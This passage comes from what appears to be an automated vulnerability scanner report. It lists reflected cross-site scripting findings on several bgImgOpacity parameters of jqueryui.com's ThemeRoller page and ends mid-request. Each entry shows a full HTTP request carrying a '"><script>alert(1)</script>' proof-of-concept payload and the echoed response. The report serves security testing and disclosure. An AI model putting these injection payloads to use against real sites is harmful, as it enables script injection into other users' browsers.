Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityActive" class="opacity" value="30ebd8c\\\"><script>alert(1)</script>8dfbc90f084" />
...[SNIP]...

1.140. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffa6"><script>alert(1)</script>b6c8666acf9 was submitted in the bgImgOpacityContent parameter. This input was echoed as bffa6\\\"><script>alert(1)</script>b6c8666acf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100bffa6"><script>alert(1)</script>b6c8666acf9&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityContent" class="opacity" value="100bffa6\\\"><script>alert(1)</script>b6c8666acf9" />
...[SNIP]...

1.141. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16f9"><script>alert(1)</script>292b42bf4e0 was submitted in the bgImgOpacityDefault parameter. This input was echoed as e16f9\\\"><script>alert(1)</script>292b42bf4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60e16f9"><script>alert(1)</script>292b42bf4e0&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityDefault" class="opacity" value="60e16f9\\\"><script>alert(1)</script>292b42bf4e0" />
...[SNIP]...

1.142. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7c0"><script>alert(1)</script>cce24fe0f0 was submitted in the bgImgOpacityError parameter. This input was echoed as 8f7c0\\\"><script>alert(1)</script>cce24fe0f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=208f7c0"><script>alert(1)</script>cce24fe0f0&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityError" class="opacity" value="208f7c0\\\"><script>alert(1)</script>cce24fe0f0" />
...[SNIP]...

1.143. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10502"><script>alert(1)</script>7764413a2d6 was submitted in the bgImgOpacityHeader parameter. This input was echoed as 10502\\\"><script>alert(1)</script>7764413a2d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=4510502"><script>alert(1)</script>7764413a2d6&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHeader" class="opacity" value="4510502\\\"><script>alert(1)</script>7764413a2d6" />
...[SNIP]...

1.144. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d13"><script>alert(1)</script>b6c76063701 was submitted in the bgImgOpacityHighlight parameter. This input was echoed as b0d13\\\"><script>alert(1)</script>b6c76063701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90b0d13"><script>alert(1)</script>b6c76063701&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:43 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHighlight" class="opacity" value="90b0d13\\\"><script>alert(1)</script>b6c76063701" />
...[SNIP]...

1.145. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609e4"><script>alert(1)</script>daa0a1be744 was submitted in the bgImgOpacityHover parameter. This input was echoed as 609e4\\\"><script>alert(1)</script>daa0a1be744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70609e4"><script>alert(1)</script>daa0a1be744&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShado